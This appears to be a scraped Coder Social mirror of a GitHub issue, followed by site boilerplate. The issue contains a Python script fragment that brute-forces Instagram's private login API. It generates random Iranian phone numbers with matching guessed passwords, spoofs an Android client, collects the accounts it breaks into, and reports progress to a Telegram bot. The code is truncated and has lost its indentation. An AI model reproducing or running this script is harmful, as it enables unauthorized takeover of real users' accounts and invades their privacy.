Coder Social home page Coder Social logo

code's Issues

kk

url = 'https://b.i.instagram.com/api/v1/accounts/login/'
headers = {'User-Agent': 'Instagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)'}
bnar = pyfiglet.figlet_format('✯ಠ_ಠ✯')
print(Z + bnar)
sleep(1)
sleep(0)
user = '0987654321'
while True:
us = str(''.join((random.choice(user) for i in range(7))))
username = '+98911' + us
password = '0911' + us
from uuid import uuid4
uid = str(uuid4())
data = {'uuid':uid,
'password':password,
'username':username,
'device_id':uid,
'from_reg':'false',
'_csrftoken':'missing',
'login_attempt_countn':'0'}
req = requests.post(url, headers=headers, data=data)
if 'logged_in_user' in req.json():
zz += 1
userQ = req.json()['logged_in_user']['username']
code_joo(userQ, password)
elif '"message":"challenge_required","challenge"' in req.json():
print(S + 'username S ==> : ' + username + ': password ==> : ' + password)
else:
requests.post(f"https://api.telegram.org/bot{tok}/editmessagetext?chat_id={ID}&message_id={id_msg}&text= 🗿اެصِبُࢪ اެݪفِحِصِ اسمحلي ɵ̷̥̥᷄ˬɵ̷̥̥᷅[{zz}]\n\🗿💘 [{aa}]")
print(E + 'username ==> : ' + username +

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.